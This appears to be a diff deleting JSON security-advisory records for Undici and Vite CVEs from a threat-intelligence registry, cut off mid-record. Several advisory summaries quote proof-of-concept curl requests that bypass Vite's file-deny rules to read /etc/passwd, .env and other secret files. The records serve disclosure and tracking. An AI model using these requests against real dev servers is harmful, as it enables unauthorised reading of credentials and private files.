"https://nodejs.org/api/zlib.html#class-zlibinflateraw"
],
"aliases": [
"CVE-2026-2229",
"GHSA-v9p9-hfj2-hcw8"
],
"cve_ids": [
"CVE-2026-2229"
],
"ghsa_ids": [
"GHSA-v9p9-hfj2-hcw8"
],
"osv_ids": [
"GHSA-v9p9-hfj2-hcw8"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

72
08-threat-intel/registry/advisories/undici--CVE-2026-2581.json
查看文件

@@ -1,72 +0,0 @@
{
"canonical_id": "undici--CVE-2026-2581",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS",
"summary": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
"published_at": "2026-03-13T20:37:58Z",
"updated_at": "2026-03-13T20:54:25.417862Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2581",
"https://hackerone.com/reports/3513473",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-2581",
"GHSA-phc3-fgpg-7m6h"
],
"cve_ids": [
"CVE-2026-2581"
],
"ghsa_ids": [
"GHSA-phc3-fgpg-7m6h"
],
"osv_ids": [
"GHSA-phc3-fgpg-7m6h"
],
"affected_versions": [
"introduced=7.17.0, fixed<7.24.0"
],
"fixed_versions": [
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

83
08-threat-intel/registry/advisories/vite--CVE-2024-23331.json
查看文件

@@ -1,83 +0,0 @@
{
"canonical_id": "vite--CVE-2024-23331",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem",
"summary": "### Summary\n[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.\n\nThis bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.\n\n### Patches\nFixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17\n\n### Details\nSince `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. \n\nSee `picomatch` usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632\n\nBy requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. \n\n### PoC\n**Setup**\n1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance. \n - `npm run dev -- --host 0.0.0.0`\n - Publicly accessible for the time being here: http://20.12.242.81:5173/ \n2. Created dummy secret files, e.g. `custom.secret` and `production.pem`\n3. Populated `vite.config.js` with\n```javascript\nexport default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }\n```\n\n**Reproduction**\n1. `curl -s http://20.12.242.81:5173/@fs//`\n - Descriptive error page reveals absolute filesystem path to project root\n2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js`\n - Discoverable configuration file reveals locations of secrets\n3. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT`\n - Secrets are directly accessible using case-augmented version of filename\n\n**Proof**\n![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)\n\n### Impact\n**Who**\n- Users with exposed dev servers on environments with case-insensitive filesystems\n\n**What**\n- Files protected by `server.fs.deny` are both discoverable, and accessible",
"published_at": "2024-01-19T21:58:47Z",
"updated_at": "2026-02-04T04:17:01.410592Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-34092",
"https://nvd.nist.gov/vuln/detail/CVE-2024-23331",
"https://github.com/vitejs/vite/commit/0cd769c279724cf27934b1270fbdd45d68217691",
"https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5",
"https://github.com/vitejs/vite/commit/a26c87d20f9af306b5ce3ff1648be7fa5146c278",
"https://github.com/vitejs/vite/commit/eeec23bbc9d476c54a3a6d36e78455867185a7cb",
"https://github.com/vitejs/vite",
"https://vitejs.dev/config/server-options.html#server-fs-deny"
],
"aliases": [
"CVE-2024-23331",
"GHSA-c24v-8rfc-w8vw"
],
"cve_ids": [
"CVE-2024-23331"
],
"ghsa_ids": [
"GHSA-c24v-8rfc-w8vw"
],
"osv_ids": [
"GHSA-c24v-8rfc-w8vw"
],
"affected_versions": [
"introduced=2.7.0, fixed<2.9.17",
"introduced=3.0.0, fixed<3.2.8",
"introduced=4.0.0, fixed<4.5.2",
"introduced=5.0.0, fixed<5.0.12"
],
"fixed_versions": [
"2.9.17",
"3.2.8",
"4.5.2",
"5.0.12"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

86
08-threat-intel/registry/advisories/vite--CVE-2024-45811.json
查看文件

@@ -1,86 +0,0 @@
{
"canonical_id": "vite--CVE-2024-45811",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
"published_at": "2024-09-17T18:44:12Z",
"updated_at": "2026-02-04T04:05:31.919291Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-45811",
"https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249",
"https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34",
"https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd",
"https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6",
"https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2024-45811",
"GHSA-9cwx-2883-4wfx"
],
"cve_ids": [
"CVE-2024-45811"
],
"ghsa_ids": [
"GHSA-9cwx-2883-4wfx"
],
"osv_ids": [
"GHSA-9cwx-2883-4wfx"
],
"affected_versions": [
"introduced=5.4.0, fixed<5.4.6",
"introduced=5.3.0, fixed<5.3.6",
"introduced=5.2.0, fixed<5.2.14",
"introduced=4.0.0, fixed<4.5.4",
"introduced=0, fixed<3.2.11",
"introduced=5.0.0, fixed<5.1.8"
],
"fixed_versions": [
"5.4.6",
"5.3.6",
"5.2.14",
"4.5.4",
"3.2.11",
"5.1.8"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

92
08-threat-intel/registry/advisories/vite--CVE-2024-45812.json
查看文件

文件差异因一行或多行过长而隐藏

78
08-threat-intel/registry/advisories/vite--CVE-2025-24010.json
查看文件

文件差异因一行或多行过长而隐藏

84
08-threat-intel/registry/advisories/vite--CVE-2025-30208.json
查看文件

@@ -1,84 +0,0 @@
{
"canonical_id": "vite--CVE-2025-30208",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite bypasses server.fs.deny when using ?raw??",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
"published_at": "2025-03-25T14:00:02Z",
"updated_at": "2026-02-04T03:13:24.371631Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30208",
"https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4",
"https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c",
"https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41",
"https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca",
"https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-30208",
"GHSA-x574-m823-4x7w"
],
"cve_ids": [
"CVE-2025-30208"
],
"ghsa_ids": [
"GHSA-x574-m823-4x7w"
],
"osv_ids": [
"GHSA-x574-m823-4x7w"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.3",
"introduced=6.1.0, fixed<6.1.2",
"introduced=6.0.0, fixed<6.0.12",
"introduced=5.0.0, fixed<5.4.15",
"introduced=0, fixed<4.5.10"
],
"fixed_versions": [
"6.2.3",
"6.1.2",
"6.0.12",
"5.4.15",
"4.5.10"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

81
08-threat-intel/registry/advisories/vite--CVE-2025-31125.json
查看文件

@@ -1,81 +0,0 @@
{
"canonical_id": "vite--CVE-2025-31125",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
"published_at": "2025-03-31T17:31:54Z",
"updated_at": "2026-02-04T04:37:24.129476Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31125",
"https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949",
"https://github.com/vitejs/vite",
"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125"
],
"aliases": [
"CVE-2025-31125",
"GHSA-4r4m-qw57-chr8"
],
"cve_ids": [
"CVE-2025-31125"
],
"ghsa_ids": [
"GHSA-4r4m-qw57-chr8"
],
"osv_ids": [
"GHSA-4r4m-qw57-chr8"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.4",
"introduced=6.1.0, fixed<6.1.3",
"introduced=6.0.0, fixed<6.0.13",
"introduced=5.0.0, fixed<5.4.16",
"introduced=0, fixed<4.5.11"
],
"fixed_versions": [
"6.2.4",
"6.1.3",
"6.0.13",
"5.4.16",
"4.5.11"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

82
08-threat-intel/registry/advisories/vite--CVE-2025-31486.json
查看文件

@@ -1,82 +0,0 @@
{
"canonical_id": "vite--CVE-2025-31486",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction was able to bypass.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
"published_at": "2025-04-04T14:20:05Z",
"updated_at": "2026-02-04T03:51:38.412061Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31486",
"https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290"
],
"aliases": [
"CVE-2025-31486",
"GHSA-xcj6-pq6g-qj4x"
],
"cve_ids": [
"CVE-2025-31486"
],
"ghsa_ids": [
"GHSA-xcj6-pq6g-qj4x"
],
"osv_ids": [
"GHSA-xcj6-pq6g-qj4x"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.5",
"introduced=6.1.0, fixed<6.1.4",
"introduced=6.0.0, fixed<6.0.14",
"introduced=5.0.0, fixed<5.4.17",
"introduced=0, fixed<4.5.12"
],
"fixed_versions": [
"6.2.5",
"6.1.4",
"6.0.14",
"5.4.17",
"4.5.12"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

80
08-threat-intel/registry/advisories/vite--CVE-2025-32395.json
查看文件

@@ -1,80 +0,0 @@
{
"canonical_id": "vite--CVE-2025-32395",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). Although an attacker can send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends to reject them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
"published_at": "2025-04-11T14:06:03Z",
"updated_at": "2026-02-04T04:11:44.900383Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-32395",
"https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-32395",
"GHSA-356w-63v5-8wf4"
],
"cve_ids": [
"CVE-2025-32395"
],
"ghsa_ids": [
"GHSA-356w-63v5-8wf4"
],
"osv_ids": [
"GHSA-356w-63v5-8wf4"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.6",
"introduced=6.1.0, fixed<6.1.5",
"introduced=6.0.0, fixed<6.0.15",
"introduced=5.0.0, fixed<5.4.18",
"introduced=0, fixed<4.5.13"
],
"fixed_versions": [
"6.2.6",
"6.1.5",
"6.0.15",
"5.4.18",
"4.5.13"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

80
08-threat-intel/registry/advisories/vite--CVE-2025-46565.json
查看文件

@@ -1,80 +0,0 @@
{
"canonical_id": "vite--CVE-2025-46565",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite's server.fs.deny bypassed with /. for files under project root",
"summary": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns were able to bypass for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n![image](https://github.com/user-attachments/assets/822f4416-aa42-461f-8c95-a88d155e674b)\n![image](https://github.com/user-attachments/assets/42902144-863a-4afb-ac5b-fc16effa37cc)",
"published_at": "2025-04-30T17:40:27Z",
"updated_at": "2026-02-04T03:27:17.681639Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-46565",
"https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-46565",
"GHSA-859w-5945-r5v3"
],
"cve_ids": [
"CVE-2025-46565"
],
"ghsa_ids": [
"GHSA-859w-5945-r5v3"
],
"osv_ids": [
"GHSA-859w-5945-r5v3"
],
"affected_versions": [
"introduced=6.3.0, fixed<6.3.4",
"introduced=6.2.0, fixed<6.2.7",
"introduced=6.0.0, fixed<6.1.6",
"introduced=5.0.0, fixed<5.4.19",
"introduced=0, fixed<4.5.14"
],
"fixed_versions": [
"6.3.4",
"6.2.7",
"6.1.6",
"5.4.19",
"4.5.14"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "file-upload-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

82
08-threat-intel/registry/advisories/vite--CVE-2025-58751.json
查看文件

文件差异因一行或多行过长而隐藏

83
08-threat-intel/registry/advisories/vite--CVE-2025-58752.json
查看文件

@@ -1,83 +0,0 @@
{
"canonical_id": "vite--CVE-2025-58752",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite's `server.fs` settings were not applied to HTML files",
"summary": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to 